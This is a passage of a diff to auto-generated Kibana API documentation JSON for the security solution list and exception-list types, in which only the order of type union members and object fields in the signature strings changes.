\"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; } & { deserializer?: string | undefined; id?: string | undefined; meta?: object | undefined; serializer?: string | undefined; version?: number | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/create_list_schema/index.ts", "deprecated": false, @@ -2023,7 +2023,7 @@ "label": "CreateListSchemaDecoded", "description": [], "signature": [ - "{ type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; id: string | undefined; name: string; description: string; meta: object | undefined; serializer: string | undefined; deserializer: string | undefined; } & { version: number; }" + "{ type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; id: string | undefined; description: string; name: string; meta: object | undefined; serializer: string | undefined; deserializer: string | undefined; } & { version: number; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/create_list_schema/index.ts", "deprecated": false, @@ -2317,7 +2317,7 @@ "label": "EntriesArray", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/entries/index.ts", "deprecated": false, @@ -2331,7 +2331,7 @@ "label": "EntriesArrayOrUndefined", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[] | undefined" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[] | undefined" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/entries/index.ts", "deprecated": false, @@ -2345,7 +2345,7 @@ "label": "Entry", "description": [], "signature": [ - "{ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }" + "{ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/entries/index.ts", "deprecated": false, @@ -2373,7 +2373,7 @@ "label": "EntryList", "description": [], "signature": [ - "{ field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; }" + "{ field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/entries_list/index.ts", "deprecated": false, @@ -2443,7 +2443,7 @@ "label": "ExceptionListItemSchema", "description": [], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/exception_list_item_schema/index.ts", "deprecated": false, @@ -2765,7 +2765,7 @@ "label": "FoundExceptionListItemSchema", "description": [], "signature": [ - "{ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }" + "{ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/found_exception_list_item_schema/index.ts", "deprecated": false, @@ -2793,7 +2793,7 @@ "label": "FoundListItemSchema", "description": [], "signature": [ - "{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; page: number; per_page: number; total: number; }" + "{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; page: number; per_page: number; total: number; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/found_list_item_schema/index.ts", "deprecated": false, @@ -2807,7 +2807,7 @@ "label": "FoundListSchema", "description": [], "signature": [ - "{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }" + "{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/found_list_schema/index.ts", "deprecated": false, @@ -2919,7 +2919,7 @@ "label": "ImportExceptionListItemSchema", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; item_id: string; list_id: string; name: string; type: \"simple\"; } & { id?: string | undefined; comments?: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[] | undefined; created_at?: string | undefined; updated_at?: string | undefined; created_by?: string | undefined; updated_by?: string | undefined; _version?: string | undefined; tie_breaker_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; item_id: string; list_id: string; name: string; type: \"simple\"; } & { id?: string | undefined; comments?: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[] | undefined; created_at?: string | undefined; updated_at?: string | undefined; created_by?: string | undefined; updated_by?: string | undefined; _version?: string | undefined; tie_breaker_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/import_exception_item_schema/index.ts", "deprecated": false, @@ -2933,7 +2933,7 @@ "label": "ImportExceptionListItemSchemaDecoded", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; item_id: string; list_id: string; name: string; type: \"simple\"; } & { id?: string | undefined; comments?: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[] | undefined; created_at?: string | undefined; updated_at?: string | undefined; created_by?: string | undefined; updated_by?: string | undefined; _version?: string | undefined; tie_breaker_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | \"namespace_type\"> & { comments: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" + "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; item_id: string; list_id: string; name: string; type: \"simple\"; } & { id?: string | undefined; comments?: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[] | undefined; created_at?: string | undefined; updated_at?: string | undefined; created_by?: string | undefined; updated_by?: string | undefined; _version?: string | undefined; tie_breaker_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | \"namespace_type\"> & { comments: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/import_exception_item_schema/index.ts", "deprecated": false, @@ -2989,7 +2989,7 @@ "label": "ImportListItemQuerySchema", "description": [], "signature": [ - "{ deserializer: string | undefined; list_id: string | undefined; serializer: string | undefined; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined; }" + "{ deserializer: string | undefined; list_id: string | undefined; serializer: string | undefined; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/import_list_item_query_schema/index.ts", "deprecated": false, @@ -3003,7 +3003,7 @@ "label": "ImportListItemQuerySchemaEncoded", "description": [], "signature": [ - "{ deserializer?: string | undefined; list_id?: string | undefined; serializer?: string | undefined; type?: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined; }" + "{ deserializer?: string | undefined; list_id?: string | undefined; serializer?: string | undefined; type?: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/import_list_item_query_schema/index.ts", "deprecated": false, @@ -3115,7 +3115,7 @@ "label": "ListArraySchema", "description": [], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" + "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | 